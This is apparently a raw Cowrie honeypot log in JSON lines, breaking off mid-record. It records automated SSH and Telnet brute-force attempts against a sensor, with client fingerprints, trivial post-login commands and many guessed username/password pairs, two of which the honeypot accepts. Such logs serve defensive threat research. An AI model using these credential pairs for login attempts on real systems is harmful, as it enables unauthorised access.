{"eventid":"cowrie.login.failed","username":"lighthouse","password":"123456","message":"login attempt [lighthouse/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:01:45.127160Z","src_ip":"45.125.211.194","session":"d24f56ca9fdf"}
{"eventid":"cowrie.session.closed","duration":2.8104360103607178,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:01:45.511740Z","src_ip":"171.244.201.132","session":"a20c72f0add4"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:01:46.339064Z","src_ip":"45.125.211.194","session":"d24f56ca9fdf"}
{"eventid":"cowrie.session.connect","src_ip":"171.244.201.132","src_port":55788,"dst_ip":"1.2.3.4","dst_port":23,"session":"76c08ae68995","protocol":"telnet","message":"New connection: 171.244.201.132:55788 (1.2.3.4:23) [session: 76c08ae68995]","sensor":"my-vps","timestamp":"2025-08-28T03:01:46.794622Z"}
{"eventid":"cowrie.login.success","username":"root","password":"icatch99","message":"login attempt [root/icatch99] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:01:47.401177Z","src_ip":"171.244.201.132","session":"76c08ae68995"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:01:47.486028Z","src_ip":"171.244.201.132","session":"76c08ae68995"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-28T03:01:47.791473Z","src_ip":"171.244.201.132","session":"76c08ae68995"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.5","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:01:49.033383Z","src_ip":"171.244.201.132","session":"76c08ae68995"}
{"eventid":"cowrie.session.closed","duration":2.2440836429595947,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:01:49.038602Z","src_ip":"171.244.201.132","session":"76c08ae68995"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":29365,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f268120361f","protocol":"ssh","message":"New connection: 45.125.211.194:29365 (1.2.3.4:22) [session: 3f268120361f]","sensor":"my-vps","timestamp":"2025-08-28T03:01:58.732529Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:01:58.752490Z","src_ip":"45.125.211.194","session":"3f268120361f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:01:58.946114Z","src_ip":"45.125.211.194","session":"3f268120361f"}
{"eventid":"cowrie.login.failed","username":"flask","password":"12345678","message":"login attempt [flask/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T03:01:59.772717Z","src_ip":"45.125.211.194","session":"3f268120361f"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:02:00.983155Z","src_ip":"45.125.211.194","session":"3f268120361f"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":9952,"dst_ip":"1.2.3.4","dst_port":22,"session":"1db350915ef8","protocol":"ssh","message":"New connection: 45.125.211.194:9952 (1.2.3.4:22) [session: 1db350915ef8]","sensor":"my-vps","timestamp":"2025-08-28T03:02:13.525927Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:02:13.546738Z","src_ip":"45.125.211.194","session":"1db350915ef8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:02:13.735581Z","src_ip":"45.125.211.194","session":"1db350915ef8"}
{"eventid":"cowrie.login.failed","username":"user1","password":"user1","message":"login attempt [user1/user1] failed","sensor":"my-vps","timestamp":"2025-08-28T03:02:14.573411Z","src_ip":"45.125.211.194","session":"1db350915ef8"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:02:15.785085Z","src_ip":"45.125.211.194","session":"1db350915ef8"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":37632,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ab9f5e9fb15","protocol":"ssh","message":"New connection: 194.233.79.134:37632 (1.2.3.4:22) [session: 9ab9f5e9fb15]","sensor":"my-vps","timestamp":"2025-08-28T03:02:25.934373Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:02:25.995108Z","src_ip":"194.233.79.134","session":"9ab9f5e9fb15"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:02:26.141026Z","src_ip":"194.233.79.134","session":"9ab9f5e9fb15"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"deploy","message":"login attempt [deploy/deploy] failed","sensor":"my-vps","timestamp":"2025-08-28T03:02:27.796188Z","src_ip":"194.233.79.134","session":"9ab9f5e9fb15"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":37674,"dst_ip":"1.2.3.4","dst_port":22,"session":"f6f97773fd9d","protocol":"ssh","message":"New connection: 45.125.211.194:37674 (1.2.3.4:22) [session: f6f97773fd9d]","sensor":"my-vps","timestamp":"2025-08-28T03:02:28.308797Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:02:28.344309Z","src_ip":"45.125.211.194","session":"f6f97773fd9d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:02:28.518498Z","src_ip":"45.125.211.194","session":"f6f97773fd9d"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"hadoop","message":"login attempt [hadoop/hadoop] failed","sensor":"my-vps","timestamp":"2025-08-28T03:02:29.356343Z","src_ip":"45.125.211.194","session":"f6f97773fd9d"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:02:30.569403Z","src_ip":"45.125.211.194","session":"f6f97773fd9d"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:02:31.502883Z","src_ip":"194.233.79.134","session":"9ab9f5e9fb15"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":52486,"dst_ip":"1.2.3.4","dst_port":22,"session":"33d0b5d1a5e4","protocol":"ssh","message":"New connection: 45.125.211.194:52486 (1.2.3.4:22) [session: 33d0b5d1a5e4]","sensor":"my-vps","timestamp":"2025-08-28T03:02:43.225659Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:02:43.241364Z","src_ip":"45.125.211.194","session":"33d0b5d1a5e4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:02:43.459320Z","src_ip":"45.125.211.194","session":"33d0b5d1a5e4"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"!QAZ@WSX","message":"login attempt [oracle/!QAZ@WSX] failed","sensor":"my-vps","timestamp":"2025-08-28T03:02:44.338895Z","src_ip":"45.125.211.194","session":"33d0b5d1a5e4"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:02:45.563244Z","src_ip":"45.125.211.194","session":"33d0b5d1a5e4"}
{"eventid":"cowrie.session.connect","src_ip":"186.225.142.90","src_port":55107,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee7b0b71c92c","protocol":"ssh","message":"New connection: 186.225.142.90:55107 (1.2.3.4:22) [session: ee7b0b71c92c]","sensor":"my-vps","timestamp":"2025-08-28T03:02:55.575804Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:02:55.897383Z","src_ip":"186.225.142.90","session":"ee7b0b71c92c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:02:57.825917Z","src_ip":"186.225.142.90","session":"ee7b0b71c92c"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":48308,"dst_ip":"1.2.3.4","dst_port":22,"session":"a0a6d7a7a246","protocol":"ssh","message":"New connection: 45.125.211.194:48308 (1.2.3.4:22) [session: a0a6d7a7a246]","sensor":"my-vps","timestamp":"2025-08-28T03:02:57.990409Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:02:58.005332Z","src_ip":"45.125.211.194","session":"a0a6d7a7a246"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:02:58.200831Z","src_ip":"45.125.211.194","session":"a0a6d7a7a246"}
{"eventid":"cowrie.login.failed","username":"test","password":"1234qwer","message":"login attempt [test/1234qwer] failed","sensor":"my-vps","timestamp":"2025-08-28T03:02:59.040879Z","src_ip":"45.125.211.194","session":"a0a6d7a7a246"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:03:00.252003Z","src_ip":"45.125.211.194","session":"a0a6d7a7a246"}
{"eventid":"cowrie.login.success","username":"root","password":"0886178631","message":"login attempt [root/0886178631] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:03:00.541899Z","src_ip":"186.225.142.90","session":"ee7b0b71c92c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:03:02.153941Z","src_ip":"186.225.142.90","session":"ee7b0b71c92c"}
{"eventid":"cowrie.command.input","input":"pwd","message":"CMD: pwd","sensor":"my-vps","timestamp":"2025-08-28T03:03:02.154840Z","src_ip":"186.225.142.90","session":"ee7b0b71c92c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","size":6,"shasum":"a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:03:02.856318Z","src_ip":"186.225.142.90","session":"ee7b0b71c92c"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:03:03.414761Z","src_ip":"186.225.142.90","session":"ee7b0b71c92c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46088,"dst_ip":"1.2.3.4","dst_port":22,"session":"d70448bab41a","protocol":"ssh","message":"New connection: 212.227.235.229:46088 (1.2.3.4:22) [session: d70448bab41a]","sensor":"my-vps","timestamp":"2025-08-28T03:03:05.805335Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:03:05.819990Z","src_ip":"212.227.235.229","session":"d70448bab41a"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:03:06.039038Z","src_ip":"212.227.235.229","session":"d70448bab41a"}
{"eventid":"cowrie.login.failed","username":"app","password":"app","message":"login attempt [app/app] failed","sensor":"my-vps","timestamp":"2025-08-28T03:03:06.467707Z","src_ip":"212.227.235.229","session":"d70448bab41a"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:03:07.574221Z","src_ip":"212.227.235.229","session":"d70448bab41a"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":43970,"dst_ip":"1.2.3.4","dst_port":22,"session":"af1143a6cf1d","protocol":"ssh","message":"New connection: 45.125.211.194:43970 (1.2.3.4:22) [session: af1143a6cf1d]","sensor":"my-vps","timestamp":"2025-08-28T03:03:12.768514Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:03:12.774853Z","src_ip":"45.125.211.194","session":"af1143a6cf1d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 